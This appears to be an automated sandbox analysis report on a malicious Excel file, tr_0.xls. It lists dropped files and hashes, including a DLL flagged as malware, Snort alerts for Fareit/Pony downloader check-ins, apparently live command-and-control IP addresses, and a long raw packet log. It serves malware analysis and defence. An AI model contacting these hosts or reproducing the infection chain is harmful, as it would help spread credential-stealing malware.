                                                                                                                                      SHA-512:1501E0C14650553D0B5599C260B84EFFD006AEB9AB3FDC6A2BE1794BBA91CE14F9B13FD5561BAAAE51E44B395F879B243BDBEB22E75C56EE9488D0CE01B88444
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\~DFB94340AE922C5B1E.TMP
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:data
Size (bytes):12933
Entropy (8bit):0.40393103847666595
Encrypted:false
MD5:0E00D70CDF82AE957E291EAD5C006B87
SHA1:F93DCB1D6E9D70E8A49295AF9F0E766FD000D3E1
SHA-256:B3139543FE0671E3E57E5A0E9FE66BBBBDB23D2A9F43CEB1057256F14F6E659B
SHA-512:B09EE8A1E81D5601224426DB854D2651C262E115FE611A4FB4616DC131A4000E0380FDF19AFC7B5F3FA04E192B14164A6E64B8BB0A716AA0D6646C1A27F8C26B
Malicious:false
C:\Users\user\AppData\Local\Temp\~DFE8090ABB1C886A57.TMP
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:data
Size (bytes):40105
Entropy (8bit):0.6626251679986942
Encrypted:false
MD5:859092B3A560607B5AC942652BBE7FAD
SHA1:38B2B6DE9360AA733C52236E3B6EF211BBB8ED4A
SHA-256:B8CDFCDFEEF0155CFD038F383AE0AC6E4F7E86B78FC3AF5BDCF5085F78B634FB
SHA-512:ACC0D0B27A5D5D984D72F2EF3C597CA61DE0E26B52D69B85F186988FA44A68018B2AF6BEB7F9C024F01C5275C0BD40F1CFF00183F5F99DD4D407E1D0C4A04F30
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu May 23 21:41:59 2019, mtime=Tue Jul 14 08:20:22 2020, atime=Tue Jul 14 08:20:22 2020, length=12288, window=hide
Size (bytes):363
Entropy (8bit):4.4095455826050145
Encrypted:false
MD5:0B4922DC2DD64AEE559735C458F987E0
SHA1:F7D5023D17E735F8FBCD71EA0F08754B9047AE52
SHA-256:D65A8ED30B86CC638B2552249EBEBD488A39E1F2CD3EDC67AF6BB506A3A9C3B1
SHA-512:CB2C6B56A40015AFB7F67153D9D8BB3D58D280B95402AC9784E72D57B7C31112C160692920E3CDF0CF268CA9676DF170E15409C774EAABAFEC27D27AD43BF248
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Size (bytes):65
Entropy (8bit):4.16181862888157
Encrypted:false
MD5:C01ED866B58D9C823D8E07646FEC533F
SHA1:59F55033ABC2C5751B2E285ECDA2440BB6D68C6A
SHA-256:3BCF37C7FBAEF839CD88F747A709979AD204AC799B743C38C9E221DE78454886
SHA-512:019E897B3762767A733C2723E49B4A886D5EC198EEB9AC42B8675139F8A7E9B290D632EBE314C9E0BD2C26B69A7174FE2B7437860244D5EB88261161053FA5EB
Malicious:false
Preview: Desktop.LNK=0..[xls]..tr_0.LNK=0..tr_0.LNK=0..[xls]..tr_0.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tr_0.LNK
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 11 07:46:57 2020, mtime=Tue Jul 14 08:20:23 2020, atime=Tue Jul 14 08:20:23 2020, length=92672, window=hide
Size (bytes):960
Entropy (8bit):4.518547725377104
Encrypted:false
MD5:B5F219236647C9E17EC9167134F2EA42
SHA1:2B6804594C199C961E95B7EBA65135EB0995A07E
SHA-256:230E339083AC0A3D523FE99809B9BFB44D10466F33877CF819DC79CEE9BBBA9C
SHA-512:676C3191C99839FA6F35D933C4F94BDC4971A92CFA7F399AE65BB72550AA53402CC555DA1DA41E2E86CCCCA732E4618898386E53C4B7B36AB7A72B914A18E612
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:Little-endian UTF-16 Unicode text, with CR line terminators
Size (bytes):16
Entropy (8bit):2.6556390622295662
Encrypted:false
MD5:7C2BCD8D62C7D1E49DDD33CE20876267
SHA1:B09141445851302075E4A46F9F48998FF8695857
SHA-256:940436D80A7A518EC2740082FFBBA23DCC0F3A5F6D25F4C9A912949DBBDC9606
SHA-512:C67FC36383FC25401169CDFA75B9872A207C8AB8DFC0BE1A0DA4DA5E7D62B7F0720A9E09588A570780232B1176D9C547251CA26B4759D391CBF3CCBEEA1DF3F3
Malicious:false
Preview: ....L.y.n.n.....
C:\Users\user\Desktop\DAA20000
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:Applesoft BASIC program data, first line number 16
Size (bytes):149754
Entropy (8bit):5.674977526140447
Encrypted:false
MD5:BBD400DE075A1ED46A60CD8B74D48507
SHA1:30AE35FCC89956B75A102A11F3560A0CB221558A
SHA-256:3C2DC024916ED7C207CAA3A5CAA9190314CF36BFA12B6EAB8BD8C6B5E50A4988
SHA-512:21FE852621C1F40D678C4D3D2582239D4A812743472143A0D5B37A8EC6CF345373AE8659E19CC630B79433CB48F6DA3F88237E55676E02BAF702A4B881F34AB6
Malicious:false
C:\Users\user\Documents\dDdoiBj.ocx
Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):375808
Entropy (8bit):4.732447683360025
Encrypted:false
MD5:7E9C8822BE0F73073CE2CC5EF5A13C96
SHA1:10B2F8667DB53EAF1B85A209D9B80B834425167F
SHA-256:BD6840CC208517847E130DB0C847E715BA80A88E210E6383B37C1D0381877EE5
SHA-512:120BFEC74EED70DC19D7AFF9ED8DC392616A6C652F4C7B3F642219C6D5203038E66CEF65E67B79041B8653B65021E2402B3CFC0F3B6850AFD1D13E2A03637118
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 48%
• Antivirus: Metadefender, Detection: 16%
• Antivirus: ReversingLabs, Detection: 32%

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Jul 12 20:50:48 2020, Last Saved Time/Date: Mon Jul 13 08:41:20 2020, Security: 0
Entropy (8bit):5.435314060016419
TrID:
• Microsoft Excel sheet (30009/1) 78.94%
• Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:tr_0.xls
File size:92165
MD5:08f03e9133419730830daa1d5c05f2ea
SHA1:0fbe4abe79048fb25f00e11c3f53b9729ea2019b
SHA256:ee2dc4300f18802a18616e9e5434b2a0d438c819d2229d3724fa266ae881dbf7
SHA512:d272fc170333bca041dba873120303694f99bd6f89e32b73597ad8cb6da63e54b45e1f15c34ca8494369d091693c456076374f3fb58c66ce08d1f5140e2745c1
SSDEEP:1536:0Yyk3hbdlylKsgqopeJBWhZFGkE+cL2NdAU8enuoLf04Gq4nV/hS5vfiyrA4H9OP:0Xk3hbdlylKsgqopeJBWhZFGkE+cL2N4

File Icon

Icon Hash:74ecd4c6c3c6c4d8

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "tr_0.xls"

Indicators

Has Summary Info:True
Application Name:Microsoft Excel
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:False

Summary

Code Page:1252
Author:
Last Saved By:
Create Time:2020-07-12 19:50:48
Last Saved Time:2020-07-13 07:41:20
Creating Application:Microsoft Excel
Security:0

Document Summary

Document Code Page:1252
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:4096
Entropy:0.308670293816
Base64 Encoded:False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.244126493356
Base64 Encoded: False
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81842
General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 81842
Entropy: 5.85626636623
Base64 Encoded: True

Macro 4.0 Code


Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                     Source Port  Dest Port  Source IP      Dest IP
07/14/20-11:20:40.204414  TCP       2014411  ET TROJAN Fareit/Pony Downloader Checkin 2  49708        80         192.168.1.102  91.218.231.226
07/14/20-11:20:47.536647  TCP       2014411  ET TROJAN Fareit/Pony Downloader Checkin 2  49711        80         192.168.1.102  91.218.231.226

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Jul 14, 2020 11:20:24.126971960 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.191730976 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.192112923 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.193181992 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.257836103 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.407891035 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.407928944 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.407953978 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408010006 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408035994 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408061028 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408087015 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408113003 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408138037 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408149958 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.408165932 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.408343077 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.472898960 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.472948074 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.472994089 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473016977 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473072052 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473098040 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473120928 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473143101 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473165035 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473187923 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473210096 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473227024 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.473231077 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473253965 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473277092 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473299026 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473323107 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473345041 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473368883 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473391056 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473412037 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.473469973 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.474157095 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.538229942 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538316011 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538361073 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538393021 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538414001 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538434029 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538455009 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538475037 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538495064 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538516045 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538536072 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538556099 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538556099 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.538575888 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538595915 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538615942 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538635015 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538655043 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538674116 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538695097 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538723946 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538733006 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.538742065 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538762093 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538803101 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538834095 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538853884 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538875103 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538893938 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538908005 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.538913965 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538933992 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538954973 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538974047 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.538994074 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539014101 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539033890 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539036989 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.539052963 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539072990 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539093018 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539112091 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539132118 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539151907 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.539237022 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.539388895 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.603944063 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.603997946 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604042053 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604067087 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604105949 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.604110003 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604135990 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604180098 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604229927 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604271889 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.604274988 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604300976 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604345083 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604370117 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604414940 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604460001 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.604461908 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604485989 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604531050 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604573965 CEST  80           49704      5.101.51.247   192.168.1.102
Jul 14, 2020 11:20:24.604583979 CEST  49704        80         192.168.1.102  5.101.51.247
Jul 14, 2020 11:20:24.604597092 CEST  80           49704      5.101.51.247   192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604640007 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604661942 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604705095 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604727030 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604748011 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604768038 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604778051 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.604785919 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604804993 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604827881 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604849100 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604871035 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604892969 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604918003 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604939938 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604964018 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.604986906 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605009079 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605014086 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605031967 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605053902 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605076075 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605098009 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605119944 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605137110 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605140924 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605163097 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605182886 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605201006 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605221033 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605243921 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605267048 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605288982 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605310917 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605333090 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605340004 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605351925 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605374098 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605396986 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605421066 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605443954 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605468035 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605490923 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605513096 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605535030 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605541945 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605556011 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605576038 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605595112 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605612040 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605629921 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605648041 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605665922 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605685949 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605705976 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605726957 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605746984 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605767012 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605778933 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.605787039 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605807066 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605825901 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605844021 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605860949 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605882883 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605904102 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605925083 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.605945110 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.606060982 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.606208086 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.670708895 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670774937 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670821905 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670871973 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.670918941 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.670984030 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671008110 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671042919 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671063900 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671103001 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671127081 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671130896 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671183109 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671211004 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671238899 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671287060 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671303988 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671343088 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671367884 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671377897 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671422005 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671447992 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671478033 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671528101 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671530008 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671592951 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671636105 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671655893 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671672106 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671713114 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671756983 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671761990 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671822071 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671865940 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671870947 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671899080 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.671946049 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.671947956 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.672012091 CEST80497045.101.51.247192.168.1.102
